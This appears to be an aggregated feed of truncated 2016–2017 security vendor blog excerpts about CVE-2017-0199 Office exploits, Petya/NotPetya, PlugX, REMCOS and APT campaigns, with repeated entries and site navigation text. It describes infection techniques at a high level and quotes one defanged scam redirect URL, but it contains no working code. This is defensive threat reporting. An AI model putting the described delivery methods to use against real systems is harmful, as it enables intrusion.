CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (Detected by Trend Micro as TROJ_CVE20
Trendmicro
CVE-2017-0199: New Malware Abuses PowerPoint Slides
blogs_trendmicro·2017-08-14·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: New Malware Abuses PowerPoint Slides
Exploits y vulnerabilidades
## CVE-2017-0199: New Malware Abuses PowerPoint Slides
We recently observed a new malwae type exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild.
By: Ronnie Giagone, Rubio Wu Aug 14, 2017 Read time: ( words)
Save to Folio
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (Detected by Trend Micro as TROJ_CVE2017
Talos
When combining exploits for added effect goes wrong
blogs_talos·2017-08-14·CVSS 8.8
CVE-2017-0199 [HIGH] When combining exploits for added effect goes wrong
## When combining exploits for added effect goes wrong
## Introduction Since public disclosure in April 2017, CVE-2017-0199 has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.
In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, CVE-2012-0158 , possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.
Analysis of the payload highlight
Securelist
APT Trends report Q2 2017
blogs_securelist·2017-08-08
APT Trends report Q2 2017
Table of Contents
- Introduction
- Russian-Speaking Actors
- English-Speaking Actors
- Korean-speaking Actors
- Middle Eastern Actors
- Chinese-Speaking Actors
- Best of the rest
- Predictions
- How to keep yourself protected
Authors
- GReAT
## Introduction
Since 2014, Kaspersky Lab’s Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide-range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first
Securelist
APT Trends report Q2 2017
blogs_securelist·2017-08-08·CVSS 7.8
[HIGH] APT Trends report Q2 2017
Table of Contents
Introduction
Russian-Speaking Actors
English-Speaking Actors
Korean-speaking Actors
Middle Eastern Actors
Chinese-Speaking Actors
Best of the rest
Predictions
How to keep yourself protected
Authors
GReAT
## Introduction
Kaspersky’s Private Threat Intelligence Portal (TIP)
In Q1 of 2017 we published our first APT Trends report , highlighting our top research findings over the last few months. We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to
Trendmicro
Emails with Backdoor Targets Russian Businesses
blogs_trendmicro·2017-08-07
Emails with Backdoor Targets Russian Businesses
Malware
# Emails with Backdoor Targets Russian Businesses
A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system
By: Lenart Bermejo, Ronnie Giagone, Rubio Wu, Fyodor Yarochkin
2017/08/07
Read time: ( words)
Save to Folio
A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.
We’ve observed at
Trendmicro
Emails with Backdoor Targets Russian Businesses
blogs_trendmicro·2017-08-07
Emails with Backdoor Targets Russian Businesses
Malware
## Emails with Backdoor Targets Russian Businesses
A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system
By: Lenart Bermejo, Ronnie Giagone, Rubio Wu, Fyodor Yarochkin 2017/08/07 Read time: ( words)
Save to Folio
A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.
We’ve observed at
Trendmicro
Emails with Backdoor Targets Russian Businesses
blogs_trendmicro·2017-08-07
Emails with Backdoor Targets Russian Businesses
Malware
## Emails with Backdoor Targets Russian Businesses
A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system
By: Lenart Bermejo, Ronnie Giagone, Rubio Wu, Fyodor Yarochkin Aug 07, 2017 Read time: ( words)
Save to Folio
A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.
We’ve observed a
Fortinet
Incomplete Patch: More Joomla! Core XSS Vulnerabilities Are Found
blogs_fortinet·2017-07-12·CVSS 6.1
[MEDIUM] Incomplete Patch: More Joomla! Core XSS Vulnerabilities Are Found
FORTIGUARD LABS THREAT RESEARCH
Incomplete Patch: More Joomla! Core XSS Vulnerabilities Are Found
By Zhouyuan Yang | July 12, 2017
Joomla! is one of the world's most popular content management systems (CMS). It enables users to build Web sites and powerful online applications. More than 3 percent of Web sites are running Joomla!, and it accounts for more than 9 percent of CMS market share.
As of July 2017, Joomla! has been downloaded over 82 million times. Over 7,800 free and commercial extensions are available from the official Joomla! Extension Directory, and more are available from other sources.
In my last blog, I discovered 2 Cross-Site Scripting (XSS) vulnerabilities in Joomla!. They are identified as CVE-2017-7985 and CVE-2017-7986. After analyzing the patches for these issues,
Unit42
Paranoid PlugX
blogs_unit42·2017-06-27
Paranoid PlugX
Threat Research Center
Threat Research
Malware
## Paranoid PlugX
Tom Lancaster
Esmid Idrizovic
Published: June 27, 2017
Malware
Threat Research
Application Whitelisting Bypass
PlugX
Threat intelligence
The PlugX malware has a long and extensive history of being used in intrusions as part of targeted attacks. PlugX is still popular today and its longevity is remarkable. The malware itself is well documented, with multiple excellent papers covering most aspects of its functionality. Some of the best write-ups on the malware are cited below:
TR-12 – Analysis of a PlugX malware variant used for targeted attacks. (Circl)
Analysis of a Recent PlugX Variant - "P2P PlugX" (JPCert)
PlugX some uncovered points (Airbus)
PlugX – The Next Generation (Sophos)
Given this wealth of info
Tenable
Petya/NotPetya Ransomware Detection for the Modern Enterprise
blogs_tenable·2017-06-27
Petya/NotPetya Ransomware Detection for the Modern Enterprise
Blog / Research
Subscribe
# Petya/NotPetya Ransomware Detection for the Modern Enterprise
Mehul Revankar
June 27, 2017
3 Min Read
A new version of the Petya malware is spreading globally, including the European Union, Ukraine and Russia. It has already impacted many organizations, both large and small, and has compromised systems at Ukraine’s central bank, its state telecommunications company, municipal metro, and Kiev’s Boryspil International Airport.
### Background
Petya ransomware is powered by Shadow Brokers exploits, which were leaked earlier this year. After compromising a system, the malware encrypts the data using a private key, and prevents users from accessing the system until it is restored or decrypted. The initial infection vector for this campaign appears to be a poiso
Fortinet
New Ransomworm Follows WannaCry Exploits
blogs_fortinet·2017-06-27·CVSS 7.8
[HIGH] New Ransomworm Follows WannaCry Exploits
FORTIGUARD LABS THREAT RESEARCH
New Ransomworm Follows WannaCry Exploits
By Aamir Lakhani | June 27, 2017
We are currently tracking a new ransomware variant sweeping across the globe that has the ability to modify the Master Boot Record similar to a previous attack known as Petya. Researchers are referring to it as either Petya or NotPetya as it hasn't been determined if this malware is a variant belonging to the Petya family. It is currently having an impact on a wide range of industries and organizations, including critical infrastructure such as energy, banking, and transportation systems.
This is a new generation of ransomware designed to take timely advantage of recent exploits. This malware targets a variety of attack vectors, including the same vulnerabilities that were exploited
Zscaler
Petya Ransomware Outbreak | Zscaler Security Blog
blogs_zscaler·2017-06-27
Petya Ransomware Outbreak | Zscaler Security Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Unit42
Paranoid PlugX
blogs_unit42·2017-06-27
Paranoid PlugX
The PlugX malware has a long and extensive history of being used in intrusions as part of targeted attacks. PlugX is still popular today and its longevity is remarkable. The malware itself is well documented, with multiple excellent papers covering most aspects of its functionality. Some of the best write-ups on the malware are cited below:
- TR-12 – Analysis of a PlugX malware variant used for targeted attacks. (Circl)
- Analysis of a Recent PlugX Variant - "P2P PlugX" (JPCert)
- PlugX some uncovered points (Airbus)
- PlugX – The Next Generation (Sophos)
Given this wealth of information in the public domain, PlugX receives a lot of attention from security vendors who put efforts into providing detection mechanisms for it. Despite this, it remains a tool of choice for many attackers toda
Tenable
Petya/NotPetya Ransomware Detection for the Modern Enterprise
blogs_tenable·2017-06-27
Petya/NotPetya Ransomware Detection for the Modern Enterprise
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
2017-6-26 Global Cyber Attack Reports
blogs_checkpoint·2017-06-26
CVE-2017-8558 2017-6-26 Global Cyber Attack Reports
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 2017-6-26 Global Cyber Attack Reports
TOP ATTACKS AND BREACHES
Honda, the Japanese motor conglomerate, has halted its car production in one of its domestic car plants, after finding WannaCry ransomware in its network. The affected plant produces approximately 1,000 vehicles a day. It is unknown how and when Honda’s network got infected. In a related topic, WannaCry has hit 55 speed and red-light cameras in Australia, after a human operator has connected an infected USB device to the cameras, which apparently run
Fortinet
Security Research News in Brief - May 2017 Edition
blogs_fortinet·2017-06-22
Security Research News in Brief - May 2017 Edition
INDUSTRY TRENDS & INSIGHTS
Security Research News in Brief - May 2017 Edition
By Axelle Apvrille | June 22, 2017
Welcome back to our monthly review of some of the most interesting security research publications. This month, let's do a bit of crypto...
Past editions:
April 2017
March 2017
P. Carru, Attack TrustZone with Rowhammer
Rowhammer is an attack on DRAM, which consists in repeatedly accessing given rows of the DRAM to cause random bit flips in adjacent rows.
Until now, the attack hadn't been demonstrated on ARM's TrustZone: but that's what the author implemented. He demonstrated that, using Rowhammer, it is possible to leak a private RSA key stored in TrustZone's secure side.
His attack is implemented as follows:
On the TrustZone non-secure side lies a Linux OS.
On TrustZone'
Trendmicro
The Trail of BlackTech’s Cyber Espionage Campaigns
blogs_trendmicro·2017-06-22·CVSS 9.8
[CRITICAL] The Trail of BlackTech’s Cyber Espionage Campaigns
# The Trail of BlackTech’s Cyber Espionage Campaigns
Following the activities and evolving tactics of cyberespionage group BlackTech helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns: PLEAD, Shrouded Crossbow, and of late, Waterbear.
By: Lenart Bermejo, Razor Huang, CH Lei
2017/06/22
Read time: ( words)
Save to Folio
BlackTech is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong. Based on the mutexes and domain names of some of their C&C servers, BlackTech’s campaigns are likely designed to steal their target’s technology.
Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three see
Fortinet
An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability
blogs_fortinet·2017-06-04·CVSS 7.8
CVE-2017-0199 [HIGH] An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability
FORTIGUARD LABS THREAT RESEARCH
An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability
By Wayne Chin Yick Low | June 04, 2017
FortiGuard Labs recently came across a new strain of samples exploiting the CVE-2017-0199 vulnerability. This vulnerability was fixed by Microsoft and the patch was released in April 2017. Due to its simplicity, it can be easily exploited by attackers. It has also been found in-the-wild by other vendors. We have also blogged about some samples recently found in spear phishing attack.
While there are plenty of articles discussing this vulnerability, most of them are intended for technical readers and primarily focus on how to create proof-of-concept (POC) for the vulnerability. If you are looking for an easy-to-understand article, we found
Fortinet
Spear Phishing Fileless Attack with CVE-2017-0199
blogs_fortinet·2017-05-30·CVSS 7.8
CVE-2017-0199 [HIGH] Spear Phishing Fileless Attack with CVE-2017-0199
FORTIGUARD LABS THREAT RESEARCH
Spear Phishing Fileless Attack with CVE-2017-0199
By Bahare Sabouri and He Xu | May 30, 2017
Introduction
CVE-2017-0199 is a remote code execution vulnerability that exists in the way that Microsoft Office and WordPad parse specially crafted files. An attacker who successfully exploits this vulnerability can take control of an affected system and then install programs, view, change, or delete data, or create new accounts with full user rights.
Microsoft issued a patch for this vulnerability April, and most security vendors have published alarms for it. Unfortunately, attacks targeting this vulnerability are still widely being used in the wild.
One of our FortiSandbox devices recently detected a suspicious RTF (Rich Text Format) file that it tagged as hig
Talos
Cisco Coverage for CVE-2017-0199
blogs_talos·2017-04-14·CVSS 7.8
CVE-2017-0199 [HIGH] Cisco Coverage for CVE-2017-0199
Over the past week, information regarding a serious zero-day vulnerability (CVE-2017-0199) in Microsoft Office was publically disclosed. Since learning of this flaw, Talos has been actively investigating the issue. Preliminary reports indicated that this vulnerability was actively being exploited in the wild and used to compromise hosts with Dridex, a well-known banking trojan.
On Tuesday, April 11, Microsoft released a patch for CVE-2017-0199. CVE-2017-0199 is an arbitrary code execution vulnerability in Microsoft Office which manifests due to improper handling of Rich Text Format (RTF) files. Exploitation of this flaw has been observed in email-based attacks where adversaries bait users to open a specifically crafted document attached to the message. Given that this vulnerability contin
Talos
Cisco Coverage for CVE-2017-0199
blogs_talos·2017-04-14·CVSS 7.8
CVE-2017-0199 [HIGH] Cisco Coverage for CVE-2017-0199
## Cisco Coverage for CVE-2017-0199
Over the past week, information regarding a serious zero-day vulnerability (CVE-2017-0199) in Microsoft Office was publically disclosed. Since learning of this flaw, Talos has been actively investigating the issue. Preliminary reports indicated that this vulnerability was actively being exploited in the wild and used to compromise hosts with Dridex, a well-known banking trojan.
On Tuesday, April 11, Microsoft released a patch for CVE-2017-0199. CVE-2017-0199 is an arbitrary code execution vulnerability in Microsoft Office which manifests due to improper handling of Rich Text Format (RTF) files. Exploitation of this flaw has been observed in email-based attacks where adversaries bait users to open a specifically crafted document attached to the message.
Sentinelone
CVE-2017-0199: What REAL 0-Day Vulnerability Protection Looks Like
blogs_sentinelone·2017-04-13·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: What REAL 0-Day Vulnerability Protection Looks Like
News of a Microsoft Word 0-day vulnerability spread like wildfire this week. Discovered by FireEye , the attack uses is executed when a user opens a Word attachment that includes a malicious OLE2 (Object Linking and Embedding) embedded in a specially-crafted Word document that can then spread the Dridex banking Trojan. The 0-day vulnerability, CVE-2017-0199 , was patched as part of Microsoft’s Patch Tuesday security updates this week.
SentinelOne customers were protected from this vulnerability even without a product update. How did we do this? In the below video demonstration, I will show how the SentinelOne Endpoint Protection Platform agent was able to detect and prevent an attack utilizing an exploit for the CVE-2017-0199 vulnerability. The version of the agent being tested was releas
Sentinelone
CVE-2017-0199: What REAL 0-Day Vulnerability Protection Looks Like
blogs_sentinelone·2017-04-13·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: What REAL 0-Day Vulnerability Protection Looks Like
News of a Microsoft Word 0-day vulnerability spread like wildfire this week. Discovered by FireEye, the attack uses is executed when a user opens a Word attachment that includes a malicious OLE2 (Object Linking and Embedding) embedded in a specially-crafted Word document that can then spread the Dridex banking Trojan. The 0-day vulnerability, CVE-2017-0199, was patched as part of Microsoft’s Patch Tuesday security updates this week.
SentinelOne customers were protected from this vulnerability even without a product update. How did we do this? In the below video demonstration, I will show how the SentinelOne Endpoint Protection Platform agent was able to detect and prevent an attack utilizing an exploit for the CVE-2017-0199 vulnerability. The version of the agent being tested was released
Zscaler
Microsoft Office 0-Day leveraged in spam campaigns | Zscaler
blogs_zscaler·2017-04-13·CVSS 7.8
[HIGH] Microsoft Office 0-Day leveraged in spam campaigns | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Talos
Microsoft Patch Tuesday - April 2017
blogs_talos·2017-04-12·CVSS 7.8
CVE-2017-0106 [HIGH] Microsoft Patch Tuesday - April 2017
## Microsoft Patch Tuesday - April 2017
It’s that time again! Today we bring you April’s Microsoft Patch Tuesday information. These fixed vulnerabilities affect Outlook, Edge, Internet Explorer, Hyper-V, .NET, and Scripting Engine.
## Bulletins Rated Critical
CVE-2017-0106 outlines a vulnerability in Microsoft Word. It permits the bypass of security features when document loading is done via Outlook attachments for certain crafted emails. Successful exploitation of this issue may grant an attacker remote code execution.
CVE-2017-0158 details a vulnerability caused by certain malicious HTML files with VBScript content. Successful exploitation of this issue may grant an attacker remote code execution.
CVE-2017-0160 outlines a compromised WMI server accessed over DCOM using System.Manage
Talos
Microsoft Patch Tuesday - April 2017
blogs_talos·2017-04-12·CVSS 7.8
CVE-2017-0106 [HIGH] Microsoft Patch Tuesday - April 2017
It’s that time again! Today we bring you April’s Microsoft Patch Tuesday information. These fixed vulnerabilities affect Outlook, Edge, Internet Explorer, Hyper-V, .NET, and Scripting Engine.
### Bulletins Rated Critical
CVE-2017-0106 outlines a vulnerability in Microsoft Word. It permits the bypass of
security features when document loading is done via Outlook attachments for
certain crafted emails. Successful exploitation of this issue may grant an
attacker remote code execution.
CVE-2017-0158 details a vulnerability caused by certain malicious HTML files with VBScript content. Successful exploitation of this issue may grant an attacker remote code execution.
CVE-2017-0160 outlines a compromised WMI server accessed over DCOM using System.Management classes or the Powershell Get-WmiOb
Qualys
Microsoft Fixes 45 Vulnerabilities with new Security Update Guide – says goodbye to Security Bulletins
blogs_qualys·2017-04-11·CVSS 7.5
[HIGH] Microsoft Fixes 45 Vulnerabilities with new Security Update Guide – says goodbye to Security Bulletins
Today is the first month since 1998 in which Microsoft stopped releasing security bulletins with the familiar MSxx-xxx format and replaced it with the new security update guide . We talked about this change earlier in a few blog posts and finally today it’s time to say good bye to security bulletins which essentially combined related vulnerabilities and products for easy of consumption.
In today’s release Microsoft fixed a total of 45 vulnerabilities that could lead to remote code execution, denial-of-service, elevation of privileges, security feature bypass and spoofing. Top priority goes to the Office and WordPad CVE-2017-0199 which fixed a 0-day vulnerability that is being actively exploited in the wild. Exploitation of this vulnerability requires that a user open or preview a speciall
Qualys
Microsoft Fixes 45 Vulnerabilities with new Security Update Guide - says goodbye to Security Bulletins | Qualys
blogs_qualys·2017-04-11·CVSS 7.5
[HIGH] Microsoft Fixes 45 Vulnerabilities with new Security Update Guide - says goodbye to Security Bulletins | Qualys
Today is the first month since 1998 in which Microsoft stopped releasing security bulletins with the familiar MSxx-xxx format and replaced it with the new security update guide. We talked about this change earlier in a few blog posts and finally today it’s time to say good bye to security bulletins which essentially combined related vulnerabilities and products for easy of consumption.
In today’s release Microsoft fixed a total of 45 vulnerabilities that could lead to remote code execution, denial-of-service, elevation of privileges, security feature bypass and spoofing. Top priority goes to the Office and WordPad CVE-2017-0199 which fixed a 0-day vulnerability that is being actively exploited in the wild. Exploitation of this vulnerability requires that a user open or preview a specially
Fortinet
In-Depth Look at New Variant of MONSOON APT Backdoor, Part 1
blogs_fortinet·2017-04-05·CVSS 7.8
CVE-2015-1641 [HIGH] In-Depth Look at New Variant of MONSOON APT Backdoor, Part 1
FORTIGUARD LABS THREAT RESEARCH
In-Depth Look at New Variant of MONSOON APT Backdoor, Part 1
By Jasper Manuel and Artem Semenchenko | April 05, 2017
Three weeks ago, FortiGuard Labs, along with @_ddoxer (Roland de la Paz), using VirusTotal Intelligence queries, spotted a document with the politically themed file name “Senate_panel.doc”. This malicious RTF file takes advantage of the vulnerability CVE-2015-1641. Upon successful exploitation, it drops a malware in the %appdata%\Microsoft directory. To evade suspicion by the victim, it also drops a decoy document which shows the symbol of the Ministry of Foreign Affairs of Pakistan on the first page, but on the next pages shows an article about the Senate of Pakistan.
Decoy document
As we were unable to identify which malware family the d
Fortinet
In-Depth Look at New Variant of MONSOON APT Backdoor, Part 2
blogs_fortinet·2017-04-05·CVSS 7.8
[HIGH] In-Depth Look at New Variant of MONSOON APT Backdoor, Part 2
FORTIGUARD LABS THREAT RESEARCH
In-Depth Look at New Variant of MONSOON APT Backdoor, Part 2
By Jasper Manuel and Artem Semenchenko | April 05, 2017
In part 1 of FortiGuard Labs’ analysis of a new variant of the BADNEWS backdoor, which is actively being used in the MONSOON APT campaign, we did a deep technical analysis of what this backdoor of capable of and how the bad guys control it using the command and control server. In this part of the analysis, we will try to discover who might be behind the distribution of these files.
Who’s Behind these Malicious Files
In part 1, we discussed that the BADNEWS backdoor is being dropped by a malicious RTF exploiting CVE-2015-1641. Interestingly, these RTF exploits contain an INCLUDEPICTURE field to insert a picture into the document which point
Sentinelone
How .LINK Files Work? - Risks, Methods, and Detection
blogs_sentinelone·2017-03-30·CVSS 7.8
[HIGH] How .LINK Files Work? - Risks, Methods, and Detection
Malicious actors keep us on our toes as they move from executables (.EXE) and scripts files to .LNK file to sneak in their payloads. With email servers routinely configured to reject attachments with file extensions like .exe, .pif, and .com, attackers have gotten more creative with their deception techniques.
From Locky to Kovter , the most popular of ransomware is getting in on the .LNK fun. After all, an attack is only as good as the size of its impact.
## What is .LNK Files? Understanding Their State
Attackers have moved to script based droppers to bypass the restrictions on email servers by deploying Microsoft JScript (.js), VisualBasic Script (.vbs), and Microsoft Office files that use macros (.doc/.xls). Using .LNK files is a further progression of this type of evasion since trad
Fortinet
Security Research News in Brief March 2017 Edition
blogs_fortinet·2017-03-24
Security Research News in Brief March 2017 Edition
FORTIGUARD LABS THREAT RESEARCH
Security Research News in Brief March 2017 Edition
By Axelle Apvrille | March 24, 2017
This blog post is a monthly review of some of last month's most interesting security research publications. Enjoy!
Garcia et al. Hey, My Malware Knows Physics! Attacking PLCs with Physical Model Aware Rootkit, NDSS, February 2017
The researchers present a rootkit for PLCs (Programmable Logic Controllers.) The rootkit sits inside the PLC's firmware. It modifies commands before they are sent out to other modules by replacing them with malicious attacks. It also modifies sensor measurements it receives, transforming them into something which looks normal so that the human operator does not detect that something wrong is happening.
The rootkit, which is named Harvey, is i
Fortinet
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
blogs_fortinet·2017-03-23·CVSS 8.1
CVE-2017-0104 [HIGH] iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
FORTIGUARD LABS THREAT RESEARCH
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
By Honggang Ren | March 23, 2017
Summary
In November 2016, as part of my FortiGuard research work, I discovered and reported on an iSNS server memory corruption vulnerability in Microsoft Windows Server. On patch Tuesday of March 2017, Microsoft released the Security Bulletin MS17-012 that contain the fix for this vulnerability and identifies it as CVE-2017-0104.
This vulnerability could lead to remote code execution, and is rated as critical by Microsoft. The vulnerability affects Windows Server 2008, 2012, and 2016 versions. Microsoft recommends installing this update immediately.
In this blog I will share the details of this vulnerability.
How to Reproduce
To reproduce the vulne
Fortinet
Microsoft Excel Files Increasingly Used To Spread Malware
blogs_fortinet·2017-03-08
Microsoft Excel Files Increasingly Used To Spread Malware
FORTIGUARD LABS THREAT RESEARCH
Microsoft Excel Files Increasingly Used To Spread Malware
By Xiaopeng Zhang | March 08, 2017
Over the last few years we have received a number of emails with attached Word files that spread malware. Now it seems that it is becoming more and more popular to spread malware using malicious Excel files. Lately, Fortinet has collected a number of email samples with Excel files attached (.xls, .xlsm) that spread malware by executing malicious VBA (Visual Basic for Applications) code.
VBA is a programming language used by Microsoft Office suite. Normally, VBA is used to develop programs for Excel to perform some tasks.
I’ll use two examples to explain how Excel files can be used to spread malware.
Excel Malware Sample 1
When the infected file is opened in Exc
Fortinet
PHPMailer Powered – Use It, But Also Remember to Update It
blogs_fortinet·2017-02-16·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPMailer Powered – Use It, But Also Remember to Update It
FORTIGUARD LABS THREAT RESEARCH
PHPMailer Powered – Use It, But Also Remember to Update It
By Tien Phan | February 16, 2017
At the end of last year, a critical vulnerability in PHPMailer that affected millions of websites – CVE-2016-10033 - was discovered by Polish security researcher Dawid Golunski. This vulnerability allows an attacker to compromise the target’s web application by executing remote code on the vulnerable web server.
There are numerous open source web applications that use PHPMailer as their main library for sending emails, including WordPress, Joomla, Yii, SugarCRM…
More than a month after PHPMailer released a patch for this critical vulnerability we compiled this short research, and the result may surprise you. As you will see, there are still a lot of web open sourc
Fortinet
REMCOS: A New RAT In The Wild
blogs_fortinet·2017-02-14
REMCOS: A New RAT In The Wild
FORTIGUARD LABS THREAT RESEARCH
REMCOS: A New RAT In The Wild
By Floser Bacurio and Joie Salvio | February 14, 2017
Remcos is another RAT (Remote Administration Tool) that was first discovered being sold in hacking forums in the second half of 2016. Since then, it has been updated with more features, and just recently, we’ve seen its payload being distributed in the wild for the first time.
This article demonstrates how this commercialized RAT is being used in an attack, and what its latest version (v1.7.3) is capable of doing. Remcos is currently being sold from $58 to $389, depending on the license period and the maximum number of masters or clients needed.
Macro Executes Malware with High System Privilege
We discovered that the Remcos RAT is being distributed through malicious Micr
Fortinet
Cloud is the New Normal: The Challenge of Securing Workloads in the Cloud – Are You Ready?
blogs_fortinet·2017-02-07
Cloud is the New Normal: The Challenge of Securing Workloads in the Cloud – Are You Ready?
INDUSTRY TRENDS & INSIGHTS
Cloud is the New Normal: The Challenge of Securing Workloads in the Cloud – Are You Ready?
By Katrina Fox | February 07, 2017
Microsoft Ignite – Australia – Gold Coast Convention and Exhibition
February 14-17th,
Pod Number: 49
Is cloud the new normal for your enterprise?
Are you moving more and more applications into the cloud?
Have you asked yourself how you are securing your data in this new world of cloud?
Scalability and flexibility are the key drivers of Cloud networking and computing. With more and more business transitioning to public cloud environments, the cloud is becoming an increasingly attractive target for hackers due to the sheer amount of data being stored in public clouds.
As a result, the number one concern for many organisations is how to
Fortinet
Watch Out For Fake Online Gaming Sites And Their Malicious Executables
blogs_fortinet·2017-02-06
Watch Out For Fake Online Gaming Sites And Their Malicious Executables
FORTIGUARD LABS THREAT RESEARCH
Watch Out For Fake Online Gaming Sites And Their Malicious Executables
By Lilia Elena Gonzalez Medina | February 06, 2017
Every year during holiday seasons, the number of phishing websites increases. This is particularly true for online gaming distribution platforms. In some cases, users not only have their login credentials stolen, but they also end up downloading and executing malicious executables. As expected, the more popular a platform is, the more targeted it will be, which is why this research blog focuses on two malware samples obtained from fake Origin and Steam websites.
Figure 1. Fake Origin phishing website
Origin Malware Sample
In addition to phishing websites that steal user credentials, we also examined a number of blogs that were being
Fortinet
LinkedIn and Baidu Redirecting to Fat-Loss and Brain Improvement Scam
blogs_fortinet·2016-12-06
LinkedIn and Baidu Redirecting to Fat-Loss and Brain Improvement Scam
FORTIGUARD LABS THREAT RESEARCH
LinkedIn and Baidu Redirecting to Fat-Loss and Brain Improvement Scam
By Nelson Ngu | December 06, 2016
We recently received a URL through Skype that caught our attention. It was a link belonging to LinkedIn, with our Skype ID as a parameter at the end of the URL.
hxxps://www.linkedin.com/slink?code=e2nsPHa#jpulusiv=victimskypeid
Usually, people would be wary when they receive links that look somewhat suspicious. But this link is from LinkedIn, the world’s largest networking site, so it would easy for anyone receiving this to quickly dismiss any thought of it being harmful. And the convincing personalized Skype ID at the end of the link only increases one’s confidence and curiosity to just click on that link!
So what happens next?
Well, once you click
Fortinet
Cybersecurity In this New Political Era
blogs_fortinet·2016-11-14
Cybersecurity In this New Political Era
INDUSTRY TRENDS & INSIGHTS
Cybersecurity In this New Political Era
By Anthony Giandomenico | November 14, 2016
The next President of the United States will begin their term in the midst of dramatic transitions happening across the world. This isn’t about the deficit or foreign policy or climate change. Advisors well versed in strategies related to those issues surround the President.
What needs to be addressed is the global transition to a digital economy. This change is affecting every aspect of our society, from how businesses generate profit to how individuals live their lives and interact socially. The digital economy and society combine technologies and services to unlock new value in the form of better quality of life and better business outcomes. It is affecting every economic se
Fortinet
